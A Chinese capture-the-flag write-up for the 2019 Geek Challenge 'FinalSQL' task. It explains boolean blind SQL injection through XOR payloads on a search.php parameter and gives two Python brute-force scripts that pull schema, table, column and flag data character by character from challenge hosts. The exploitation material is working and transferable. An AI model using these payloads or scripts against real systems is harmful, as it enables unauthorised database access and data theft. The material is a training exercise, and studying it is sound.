[极客大挑战 2019]FinalSQL

0x00 知识点

盲注

0x01 解题

根据题目提示盲注，随便点几下找到注入点

发现我们输入^符号成功跳转页面，证明存在注入

1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema
ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称

1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)
where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j)) 获取数据库表名

1^(ord(substr((select(group_concat(column_name))from(information_schema.column
s)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
获取数据库列名

获取flag:

import requests
url = "http://9c13f59b-720e-4c5a-9d63-69342c1be65a.node3.buuoj.cn/search.php"
for i in range(1,20):
    for j in range(1,128):
        d ="?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),'"+str(i)+"',1))='"+str(j)+"')^1"
        r = requests.get(url+d)
        if 'Click' in r.text:
            print(chr(j))

这里再贴一个师傅的盲注脚本：

https://blog.csdn.net/qq_42967398/article/details/102979306

import requests
import io
import sys
import string
import time

sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')       #改变标准输出的默认编码,否则s.text不能输出
'''
url = "http://118.25.14.40:8104/search.php?id=1=(1)=1"
s = requests.get(url)
s.encoding = 'utf-8' 
content = s.content

#检验是否成功
if 'NO! Not this! Click others~~~' in s.text:
    s.encoding = 'gbk' 
    print(s.text)
    

#构造sql注入语句
F1naI1y,Flaaaaag
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s
ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s
ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s
'''

url = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)=1"
url2 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%s,1))=%s)=1"
url3 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%s,1))=%s)=1"
url4 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%s,1))=%s)=1"
url5 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(password))from(F1naI1y)),%s,1))=%s)=1"
ss = ""
x = string.printable

for i in range(1,30):
    for j in x:
        payload = url5%(str(i),ord(j))
        #print(payload)
        time.sleep(0.5)
        s = requests.get(payload)
        if 'NO! Not this! Click others~~~' in s.text:
            ss += j
            print(ss)
            break

参考链接
http://www.pdsdt.lovepdsdt.com/index.php/2019/11/19/2019_geek_web/#0x20_Finalsql

https://blog.csdn.net/qq_42967398/article/details/102979306

[极客大挑战 2019]FinalSQL

原文：https://www.cnblogs.com/wangtanzhi/p/12305052.html